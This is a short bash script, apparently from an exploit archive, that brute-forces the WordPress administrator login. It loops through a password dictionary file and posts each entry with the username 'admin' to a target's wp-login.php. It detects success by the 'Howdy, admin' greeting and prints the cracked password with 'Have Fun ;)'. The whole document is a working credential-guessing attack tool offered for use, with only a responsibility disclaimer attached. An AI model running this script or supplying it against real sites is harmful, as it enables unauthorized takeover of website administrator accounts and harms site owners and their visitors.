WordPress administrative login bruteforcing script that takes in a dictionary file.
e905944cb35a696522c8681694a36bf49d346ed3420cd156fbc1bcc39a10655e
#!/usr/bin/env bash
# wordpress BruteForce v1.0
# coded By 0x90 2008
# 0x90[at]bsdmail.org
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
echo ".::Wordpress BruteForce By 0x90::."
echo "use a good dictioary rename it to bf_passwords"
echo
echo -n "Enter website with full path to wordpress:
> "
read site
n=`cat bf_passwords | wc -l`
for (( i=1; i <= $n; i++));
do
#default user is admin
password=`sed -n "$i"p bf_passwords`
b=`echo "log=admin&pwd="$password"&wp-submit=Log+In&redirect_to=wp-admin" | lynx -dump -nolist -post_data ""$site"/wp-login.php" | grep -o "Howdy, admin"`
echo trying password $password
if [ ! -z "$b" ]; then
echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit